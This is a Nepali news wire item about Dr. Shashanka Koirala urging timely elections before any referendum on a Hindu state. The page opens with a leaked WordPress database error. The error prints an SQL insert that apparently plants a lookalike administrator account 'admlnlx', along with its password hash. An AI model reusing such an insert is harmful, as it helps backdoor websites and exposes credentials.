WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDTfP76k2Z22roHLu13LRW/CtJFfmY0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 12:25:33', '', 'admlnlx', 'admlnlx')
नवलपरासी, माघ १७–
नेपाली काँग्रेसका महामन्त्री डा. शशाङ्क कोइरालाले संविधानको कार्यान्वयनका लागि समयमै तीनै तहको निर्वाचन गर्नुुपर्ने बताउनुभएको छ ।
देवचुली–१५ प्रगतिनगरस्थित पशुपति वैदिक आश्रम ट्रस्टबाट सञ्चालित धनधान्याचल महायज्ञ कार्यक्रमलाई सम्बोधन गर्दै उहाँले समयमै स्थानीय, प्रदेश र सङ्घीय निर्वाचन गराउनुपर्ने बताउँदै महामन्त्री डा.कोइरालाले त्यसपछि मात्र हिन्दू राष्ट्र बारेको जनमत लिनुपर्ने विचार राख्नुभयो ।
उहाँले हिन्दू राष्ट्र पक्षको जनमतबाट आएको सुझाव वा मतलाई सबैले स्वीकार गर्नुपर्ने बताउँदै नेपाल हिन्दू राष्ट्र हुनेमा विश्वास व्यक्त गर्नुभयो । सो आश्रम चलाउनका लागि आफ्नो पनि दायित्व रहेको उहाँले बताउनुभयो । गत शुक्रबार सुरु भएको महायज्ञ यही माघ २३ गतेसम्म चल्ने छ ।
सो ट्रस्टले सञ्चालन गरेको पशुपति साङ्गवेद आवासीय संस्कृति माविमा पढ्ने करिब सय जना वटुकका लागि एक वर्षभरि भोजन भण्डारा चलाउन सो महायज्ञ गरिएको ट्रस्टका उत्तराधिकारी धर्मराज बरालले जानकारी दिनुभयो । त्यहाँ वटुकका लागि आवासको ठूलो समस्या रहेको बताइएको छ । यस क्षेत्रका भक्तजनको पितृउद्धार गर्ने उद्देश्यले सो भण्डारा चलाइने छ । –रासस